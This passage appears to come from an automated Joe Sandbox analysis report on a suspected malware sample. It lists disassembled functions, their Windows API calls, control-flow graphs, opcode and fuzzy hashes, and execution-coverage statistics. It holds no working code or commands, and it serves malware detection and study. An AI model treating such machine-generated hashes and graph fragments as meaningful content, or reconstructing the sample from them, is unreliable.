584->542 585->542
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02B5A8E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: e5d4063b10d9e62627f7fd8fc16be9bc1f28e2ca8430484c22b5dcd712737d90
                                                      • Instruction ID: 576ba3ad74b39b829722e4037378cb64c20b2c1e7b577b4dee488b4359fe645c
                                                      • Opcode Fuzzy Hash: e5d4063b10d9e62627f7fd8fc16be9bc1f28e2ca8430484c22b5dcd712737d90
                                                      • Instruction Fuzzy Hash: CC7123B0A00B158FD724DF29D15475ABBF1FF48304F108A6ED88AEBA50DB74E945CB90
                                                      Function 02B5CB58 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 592 2b5cb58-2b5cb5b 593 2b5cb60-2b5cbf4 DuplicateHandle 592->593 594 2b5cbf6-2b5cbfc 593->594 595 2b5cbfd-2b5cc1a 593->595 594->595
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5CB26,?,?,?,?,?), ref: 02B5CBE7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 7cbc093a41da292bd1e97fc5e39436092dd136bbf766d593fcee1f9a0c1b1f21
                                                      • Instruction ID: 8ea52f79d053a311ff8aae077d96b30072ae452ff1e1f0460c5691134be65f70
                                                      • Opcode Fuzzy Hash: 7cbc093a41da292bd1e97fc5e39436092dd136bbf766d593fcee1f9a0c1b1f21
                                                      • Instruction Fuzzy Hash: AC2103B5900308AFDB10CFAAD985ADEBFF5EB48310F14845AE918A3350D378A944CFA0
                                                      Function 02B5BDE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 586 2b5bde0-2b5cbf4 DuplicateHandle 588 2b5cbf6-2b5cbfc 586->588 589 2b5cbfd-2b5cc1a 586->589 588->589
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5CB26,?,?,?,?,?), ref: 02B5CBE7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 8c872e7ef14af92b4e9efcaac58998503802490f2701e00c5a2c5232d9ed754f
                                                      • Instruction ID: 76ddc8572eb34bf90d762dd108a8850e9baaf8966d62b287ba2c67bad4aa1daa
                                                      • Opcode Fuzzy Hash: 8c872e7ef14af92b4e9efcaac58998503802490f2701e00c5a2c5232d9ed754f
                                                      • Instruction Fuzzy Hash: 3221D2B590035C9FDB10CFAAD984ADEBFF5EB48310F14805AE918A7350D378A954CFA4
                                                      Function 02B5A100 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 598 2b5a100-2b5ab48 601 2b5ab50-2b5ab7f LoadLibraryExW 598->601 602 2b5ab4a-2b5ab4d 598->602 603 2b5ab81-2b5ab87 601->603 604 2b5ab88-2b5aba5 601->604 602->601 603->604
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B5A961,00000800,00000000,00000000), ref: 02B5AB72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 9e015a790397548475e3e20e97bbc542c72ee3ac4da19da51874ed6fe50dd840
                                                      • Instruction ID: 60099d7bef9f5eb5c6ca28b93d0f1219f21f697be8d17a4c47540a166d0f4878
                                                      • Opcode Fuzzy Hash: 9e015a790397548475e3e20e97bbc542c72ee3ac4da19da51874ed6fe50dd840
                                                      • Instruction Fuzzy Hash: 8C2157B68043588FDB10CF9AC844ADEBFF4EB99320F14819AD959AB211C374A544CFA5
                                                      Function 02B5A118 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 607 2b5a118-2b5ab48 609 2b5ab50-2b5ab7f LoadLibraryExW 607->609 610 2b5ab4a-2b5ab4d 607->610 611 2b5ab81-2b5ab87 609->611 612 2b5ab88-2b5aba5 609->612 610->609 611->612
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B5A961,00000800,00000000,00000000), ref: 02B5AB72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: b80688e69d11fa7ecc21a6f98abe4a250f09b82c2def9ccb0051375c259eef6b
                                                      • Instruction ID: ebd2882db5e16b0b57b8513c4cde85f54796ec2b336ac14235f02e147359fabf
                                                      • Opcode Fuzzy Hash: b80688e69d11fa7ecc21a6f98abe4a250f09b82c2def9ccb0051375c259eef6b
                                                      • Instruction Fuzzy Hash: CA1114B6D003198FDB10CF9AD444B9EFBF5EB48310F10856AD919B7200C379A545CFA5
                                                      Function 02B5AB00 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 615 2b5ab00-2b5ab48 616 2b5ab50-2b5ab7f LoadLibraryExW 615->616 617 2b5ab4a-2b5ab4d 615->617 618 2b5ab81-2b5ab87 616->618 619 2b5ab88-2b5aba5 616->619 617->616 618->619
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B5A961,00000800,00000000,00000000), ref: 02B5AB72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 3ff7f29a15e8fe3a9216cd816029bda753722a5360cdf2620bbe2000eadd246c
                                                      • Instruction ID: e9251a00f129ea0bf5807aa3ee89bf0f75f9a7e65beb09195b21d3fade4b3f27
                                                      • Opcode Fuzzy Hash: 3ff7f29a15e8fe3a9216cd816029bda753722a5360cdf2620bbe2000eadd246c
                                                      • Instruction Fuzzy Hash: 541112B6C002098FDB10CF9AC544B9EFBF5EB48320F14855AD929B7240C379A545CFA0
                                                      Function 02B5A880 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 622 2b5a880-2b5a8c0 623 2b5a8c2-2b5a8c5 622->623 624 2b5a8c8-2b5a8f3 GetModuleHandleW 622->624 623->624 625 2b5a8f5-2b5a8fb 624->625 626 2b5a8fc-2b5a910 624->626 625->626
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02B5A8E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 022c0aac528fd330a66dcc5ff7fb4083c76dc9ad21b5de6c03b5c265783164da
                                                      • Instruction ID: 7f72b36eba1e80cacd3b79a038ef2ecdf1400fe46bf9f7d57b75674010d1ac4c
                                                      • Opcode Fuzzy Hash: 022c0aac528fd330a66dcc5ff7fb4083c76dc9ad21b5de6c03b5c265783164da
                                                      • Instruction Fuzzy Hash: 3D110FB6C003598FCB10DF9AD444B9EFBF4EB88324F10856AD819B7240C379A645CFA1
                                                      Function 07239014 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 628 7239014-723b172 PostMessageW 630 723b174-723b17a 628->630 631 723b17b-723b18f 628->631 630->631
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723B165
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1688744472.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7230000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 75670c88a66c36cffb8947d8ca536376c712eab21afe1186d49592679081d1a8
                                                      • Instruction ID: d67cb581cfca941e9ad864bac78f2643d22a8efead2efc674082da82d8c3b3a2
                                                      • Opcode Fuzzy Hash: 75670c88a66c36cffb8947d8ca536376c712eab21afe1186d49592679081d1a8
                                                      • Instruction Fuzzy Hash: BF11F5F58103499FDB10DF99C889BDFBBF8EB48310F108459E958A7250C375A944CFA1
                                                      Function 0723B100 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 633 723b100-723b172 PostMessageW 636 723b174-723b17a 633->636 637 723b17b-723b18f 633->637 636->637
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723B165
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1688744472.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7230000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 7824a4d2c60807171e9db8944271595bd3c429bc39c6e5f2800f473484d00275
                                                      • Instruction ID: a3240a09eca3bfb166203c4f91ca76ccc61cc0cea4f9e50bd4ffde91ba560332
                                                      • Opcode Fuzzy Hash: 7824a4d2c60807171e9db8944271595bd3c429bc39c6e5f2800f473484d00275
                                                      • Instruction Fuzzy Hash: 3811F2B5800349DFDB10DF9AD889BDEBBF8EB48320F10841AE958A3240C375A944CFA1
                                                      Function 02AFD4CC Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682002867.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2afd000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e88a457f2c847531bc951bb66a663ef0cc6cdae6a6287c0241f5417b12a7d803
                                                      • Instruction ID: a678b602dee5dbe1a83f5011d898ebc829e15190f0d6543472c10e54e90267a6
                                                      • Opcode Fuzzy Hash: e88a457f2c847531bc951bb66a663ef0cc6cdae6a6287c0241f5417b12a7d803
                                                      • Instruction Fuzzy Hash: 222148B1504604DFDB06DF54D9C0B26BF65FB94328F20C568EA0A0B256C73AD416C7A1
                                                      Function 02B0D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e26b3bbd3f6333ac71057f8ff4ab3d24b9e13ba2810a76ae755abbda9429dac0
                                                      • Instruction ID: d65acd170c499014bef010866ac788ef0ca450f96a1ca372ed3ef717f0cb354c
                                                      • Opcode Fuzzy Hash: e26b3bbd3f6333ac71057f8ff4ab3d24b9e13ba2810a76ae755abbda9429dac0
                                                      • Instruction Fuzzy Hash: 8821F1716042019FDB16DF54D8D4F16BFA5EB84314F20C5A9D80E4B2C2D336D406CA61
                                                      Function 02B0D1EC Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62e194e14e01016b0fcb1c2ee6d1ea14aee0e0c621c6fe5ce053219d08853a94
                                                      • Instruction ID: 95236a4b2f1e7475a44ba912a2105be2a87ec1ec1e2dd071c6a9536cb5809895
                                                      • Opcode Fuzzy Hash: 62e194e14e01016b0fcb1c2ee6d1ea14aee0e0c621c6fe5ce053219d08853a94
                                                      • Instruction Fuzzy Hash: 952125B56043019FDB02DF94D5C0B16BFA5FB88324F20CAADD84A0B3D2C336D846CAA1
                                                      Function 02B0D006 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 389907817ba7052e12c0628d1545015517beb450a0eb0f9648c4c042b48afdeb
                                                      • Instruction ID: 0ad0c53f01eac18826fd28312f33af14b622fd9c6ccebf4d2cdb59701a1bc6b5
                                                      • Opcode Fuzzy Hash: 389907817ba7052e12c0628d1545015517beb450a0eb0f9648c4c042b48afdeb
                                                      • Instruction Fuzzy Hash: D02150755083809FCB13CF54D9D4B11BF71EB46314F28C5DAD8498B2A7D33A985ACB62
                                                      Function 02AFD4C7 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682002867.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2afd000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                      • Instruction ID: 6b41a4a4c4cfef6bc4e62dbf13d340a9d943ce022aca703c73726f72691ac8c7
                                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                      • Instruction Fuzzy Hash: 5B11E676504644CFCB06CF50D5C4B16BF72FB94324F24C6A9E9090B256C33AD45ACBA2
                                                      Function 02B0D1E7 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                      • Instruction ID: 79005751a48683ae8d649a4b191093cd06ea8a4b94eef6c8857e6c4445a4dba8
                                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                      • Instruction Fuzzy Hash: 06118B75904284DFDB06CF54D5C4B15BFA2FB88324F24C6ADD8494B696C33AD84ACBA1

                                                      Non-executed Functions

                                                      Function 02B5D3DC Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 173ff0bc2b7ae11b47b7e0aed08ca783a6eb8e6b818b6da3111413c8f5f60d83
                                                      • Instruction ID: 41deb8e76d9e4dbb085ebe3715b2509865020fd9423255002a30f8e683c80137
                                                      • Opcode Fuzzy Hash: 173ff0bc2b7ae11b47b7e0aed08ca783a6eb8e6b818b6da3111413c8f5f60d83
                                                      • Instruction Fuzzy Hash: 84A16032E0061A8FCF09DFB5C84469EB7B2FF85304B1585AAE806AF261DB71E955CF50

                                                      Execution Graph

                                                      Execution Coverage:13.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:6.4%
                                                      Total number of Nodes:110
                                                      Total number of Limit Nodes:12
                                                      execution_graph 44340 908e108 44341 908e117 44340->44341 44342 908e136 44341->44342 44345 908e208 44341->44345 44349 908e1f9 44341->44349 44346 908e216 44345->44346 44347 908e221 KiUserCallbackDispatcher 44346->44347 44348 908e22a 44346->44348 44347->44348 44348->44342 44350 908e216 44349->44350 44351 908e221 KiUserCallbackDispatcher 44350->44351 44352 908e22a 44350->44352 44351->44352 44352->44342 44371 8f84168 44372 8f84178 44371->44372 44375 8f83364 44372->44375 44376 8f841a0 SendMessageW 44375->44376 44377 8f84189 44376->44377 44378 8f81928 44383 8f8748f 44378->44383 44387 8f87180 44378->44387 44394 8f87190 44378->44394 44379 8f8193c 44386 8f8740b 44383->44386 44384 8f87489 44384->44379 44386->44384 44401 8f83470 44386->44401 44390 8f87190 44387->44390 44388 8f871ca 44388->44379 44389 8f87489 44389->44379 44390->44388 44391 8f83364 SendMessageW 44390->44391 44392 8f87305 44390->44392 44391->44392 44392->44389 44393 8f83470 KiUserCallbackDispatcher 44392->44393 44393->44389 44397 8f871b6 44394->44397 44395 8f871ca 44395->44379 44396 8f87489 44396->44379 44397->44395 44398 8f83364 SendMessageW 44397->44398 44400 8f87305 44397->44400 44398->44400 44399 8f83470 KiUserCallbackDispatcher 44399->44396 44400->44396 44400->44399 44403 8f8347b 44401->44403 44402 8f85c4e 44402->44384 44403->44402 44404 8f85c4c KiUserCallbackDispatcher 44403->44404 44404->44402 44448 8f865c8 44449 8f865f3 44448->44449 44450 8f83470 KiUserCallbackDispatcher 44449->44450 44452 8f8664b 44449->44452 44451 8f86644 44450->44451 44453 8f83588 44454 8f835a1 44453->44454 44456 8f835ab 44453->44456 44454->44456 44457 8f80420 44454->44457 44459 8f8042b 44457->44459 44461 8f83420 44459->44461 44460 8f84b9a 44460->44456 44463 8f8342b 44461->44463 44462 8f84c26 44462->44460 44463->44462 44464 8f83470 KiUserCallbackDispatcher 44463->44464 44464->44462 44465 8f81b88 44466 8f81bf3 44465->44466 44467 8f81f88 44465->44467 44466->44467 44468 8f87190 2 API calls 44466->44468 44469 8f87180 2 API calls 44466->44469 44468->44467 44469->44467 44409 23be018 44410 23be024 44409->44410 44416 60e2968 44410->44416 44412 23be61f 44417 60e298a 44416->44417 44418 23be0c3 44417->44418 44429 60e992c 44417->44429 44433 60e9548 44417->44433 44421 60efc5f 44418->44421 44425 60efc68 44418->44425 44422 60efc8a 44421->44422 44423 60e9548 LdrInitializeThunk 44422->44423 44424 60efd3a 44422->44424 44423->44424 44424->44412 44426 60efc8a 44425->44426 44427 60e9548 LdrInitializeThunk 44426->44427 44428 60efd3a 44426->44428 44427->44428 44428->44412 44431 60e97e3 44429->44431 44430 60e9a69 LdrInitializeThunk 44432 60e9a81 44430->44432 44431->44430 44432->44418 44436 60e9579 44433->44436 44434 60e96d9 44434->44418 44435 60e9a69 LdrInitializeThunk 44435->44434 44436->44434 44436->44435 44353 8f82830 44354 8f8287e EnumThreadWindows 44353->44354 44355 8f82874 44353->44355 44356 8f828b0 44354->44356 44355->44354 44357 908f000 44358 908f015 44357->44358 44359 908f0df 44357->44359 44363 908e340 44359->44363 44367 908e350 44359->44367 44360 908f3f5 44364 908e350 44363->44364 44365 908e388 KiUserCallbackDispatcher 44364->44365 44366 908e374 44364->44366 44365->44366 44366->44360 44368 908e360 44367->44368 44369 908e374 44368->44369 44370 908e388 KiUserCallbackDispatcher 44368->44370 44369->44360 44370->44369 44405 8f8df60 44406 8f8df72 44405->44406 44407 8f83470 KiUserCallbackDispatcher 44406->44407 44408 8f8e08d 44406->44408 44407->44408 44437 8f88f13 44438 8f88f26 44437->44438 44442 8f89148 PostMessageW 44438->44442 44444 8f89140 44438->44444 44439 8f88f49 44443 8f891b4 44442->44443 44443->44439 44445 8f89138 44444->44445 44446 8f89143 PostMessageW 44444->44446 44445->44444 44447 8f891b4 44446->44447 44447->44439

                                                      Executed Functions

                                                      Function 023B6FC8 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 142 23b6fc8-23b6ffe 143 23b7006-23b700c 142->143 290 23b7000 call 23b6fc8 142->290 291 23b7000 call 23b7118 142->291 292 23b7000 call 23b69a0 142->292 144 23b700e-23b7012 143->144 145 23b705c-23b7060 143->145 148 23b7021-23b7028 144->148 149 23b7014-23b7019 144->149 146 23b7062-23b7071 145->146 147 23b7077-23b708b 145->147 150 23b709d-23b70a7 146->150 151 23b7073-23b7075 146->151 152 23b7093-23b709a 147->152 293 23b708d call 23ba0e8 147->293 294 23b708d call 23b9de0 147->294 295 23b708d call 23b9dd0 147->295 153 23b70fe-23b713b 148->153 154 23b702e-23b7035 148->154 149->148 155 23b70a9-23b70af 150->155 156 23b70b1-23b70b5 150->156 151->152 164 23b713d-23b7143 153->164 165 23b7146-23b7166 153->165 154->145 157 23b7037-23b703b 154->157 160 23b70bd-23b70f7 155->160 156->160 162 23b70b7 156->162 158 23b704a-23b7051 157->158 159 23b703d-23b7042 157->159 158->153 163 23b7057-23b705a 158->163 159->158 160->153 162->160 163->152 164->165 170 23b7168 165->170 171 23b716d-23b7174 165->171 173 23b74fc-23b7505 170->173 174 23b7176-23b7181 171->174 175 23b750d-23b7519 174->175 176 23b7187-23b719a 174->176 183 23b751b-23b7521 175->183 184 23b7556 175->184 181 23b719c-23b71aa 176->181 182 23b71b0-23b71cb 176->182 181->182 191 23b7484-23b748b 181->191 193 23b71ef-23b71f2 182->193 194 23b71cd-23b71d3 182->194 185 23b755e-23b7585 183->185 186 23b7523-23b7549 183->186 189 23b755c-23b755d 184->189 197 23b758b-23b759a 185->197 198 23b7587-23b7589 185->198 199 23b754b-23b7550 186->199 200 23b7552-23b7554 186->200 191->173 203 23b748d-23b748f 191->203 195 23b71f8-23b71fb 193->195 196 23b734c-23b7352 193->196 201 23b71dc-23b71df 194->201 202 23b71d5 194->202 195->196 206 23b7201-23b7207 195->206 204 23b7358-23b735d 196->204 205 23b743e-23b7441 196->205 226 23b759c-23b75ab 197->226 227 23b75e4 197->227 207 23b75e9-23b75eb 198->207 199->189 200->184 208 23b7212-23b7218 201->208 209 23b71e1-23b71e4 201->209 202->196 202->201 202->205 202->208 210 23b749e-23b74a4 203->210 211 23b7491-23b7496 203->211 204->205 216 23b7508 205->216 217 23b7447-23b744d 205->217 206->196 215 23b720d 206->215 219 23b721a-23b721c 208->219 220 23b721e-23b7220 208->220 212 23b71ea 209->212 213 23b727e-23b7284 209->213 210->175 214 23b74a6-23b74ab 210->214 211->210 212->205 213->205 223 23b728a-23b7290 213->223 221 23b74ad-23b74b2 214->221 222 23b74f0-23b74f3 214->222 215->205 216->175 224 23b744f-23b7457 217->224 225 23b7472-23b7476 217->225 228 23b722a-23b7233 219->228 220->228 221->216 230 23b74b4 221->230 222->216 229 23b74f5-23b74fa 222->229 231 23b7292-23b7294 223->231 232 23b7296-23b7298 223->232 224->175 233 23b745d-23b746c 224->233 225->191 236 23b7478-23b747e 225->236 226->227 243 23b75ad-23b75b3 226->243 227->207 234 23b7246-23b726e 228->234 235 23b7235-23b7240 228->235 229->173 229->203 237 23b74bb-23b74c0 230->237 238 23b72a2-23b72b9 231->238 232->238 233->182 233->225 263 23b7362-23b7398 234->263 264 23b7274-23b7279 234->264 235->205 235->234 236->174 236->191 240 23b74e2-23b74e4 237->240 241 23b74c2-23b74c4 237->241 255 23b72bb-23b72d4 238->255 256 23b72e4-23b730b 238->256 240->216 251 23b74e6-23b74e9 240->251 246 23b74d3-23b74d9 241->246 247 23b74c6-23b74cb 241->247 248 23b75b7-23b75c3 243->248 249 23b75b5 243->249 246->175 253 23b74db-23b74e0 246->253 247->246 254 23b75c5-23b75de 248->254 249->254 251->222 253->240 257 23b74b6-23b74b9 253->257 254->227 269 23b75e0-23b75e2 254->269 255->263 268 23b72da-23b72df 255->268 256->216 271 23b7311-23b7314 256->271 257->216 257->237 272 23b739a-23b739e 263->272 273 23b73a5-23b73ad 263->273 264->263 268->263 269->207 271->216 274 23b731a-23b7343 271->274 275 23b73bd-23b73c1 272->275 276 23b73a0-23b73a3 272->276 273->216 277 23b73b3-23b73b8 273->277 274->263 289 23b7345-23b734a 274->289 278 23b73c3-23b73c9 275->278 279 23b73e0-23b73e4 275->279 276->273 276->275 277->205 278->279 281 23b73cb-23b73d3 278->281 282 23b73ee-23b740d call 23b76f1 279->282 283 23b73e6-23b73ec 279->283 281->216 285 23b73d9-23b73de 281->285 284 23b7413-23b7417 282->284 283->282 283->284 284->205 287 23b7419-23b7435 284->287 285->205 287->205 289->263 290->143 291->143 292->143 293->152 294->152 295->152
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (odq$(odq$(odq$,hq$,hq
                                                      • API String ID: 0-2216594193
                                                      • Opcode ID: 0f5fb83dc6a680fdb3b6c1ca9266cd50bc3513132c56044f13e3813e70547aff
                                                      • Instruction ID: 68af2e9f1815320ba2e84859de1490d7ce4d9cba009ea373a1427d6f0ab8f67c
                                                      • Opcode Fuzzy Hash: 0f5fb83dc6a680fdb3b6c1ca9266cd50bc3513132c56044f13e3813e70547aff
                                                      • Instruction Fuzzy Hash: 47223B72A002199FCB16CF69C984AEDFBF6FF88305F15846AE905EBA61D730D941CB50
                                                      Function 023BC146 Relevance: 6.5, Strings: 5, Instructions: 251COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
